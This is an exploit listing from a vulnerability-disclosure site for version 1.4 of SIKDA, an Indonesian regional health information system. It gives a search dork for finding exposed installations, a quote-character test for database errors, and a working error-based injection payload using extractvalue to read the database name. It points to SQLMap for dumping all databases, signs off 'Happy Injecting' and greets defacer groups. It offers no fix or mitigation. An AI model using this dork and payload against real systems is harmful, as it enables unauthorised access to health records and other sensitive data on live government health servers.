Sistem Informasi Kesehatan Daerah v1.4 (SIKDA) Xpath Injection Vulnerability

2019.06.24
id Sn00py (ID) id
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Sistem Informasi Kesehatan Daerah v1.4 (SIKDA) Xpath Injection Vulnerability # Dork: intext:SIKDA Generik - All Rights Reserved # Date: 24-06-2019 # Exploit Author: ./Sn00py # Vendor Homepage: https://e-sikda.kemkes.go.id # Software Link: N/A # Category: Webapps # Version: 1.4 # Tested on: Windows 10 Pro # CVE : N/A ======================================= [+]Proof Of Concept: First, you have to find out whether you have to log in and if you enter a string ' . Database Errors Occur then it's vuln [+]Exploit: ' and extractvalue(0x0a,concat(0x0a,(select database())))-- - *You can use SQLMap or manually using the Xpath Injection technique to retrieve all databases~ [+]Demo? No Demo ^^ Happy Injecting~ Greetz: Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top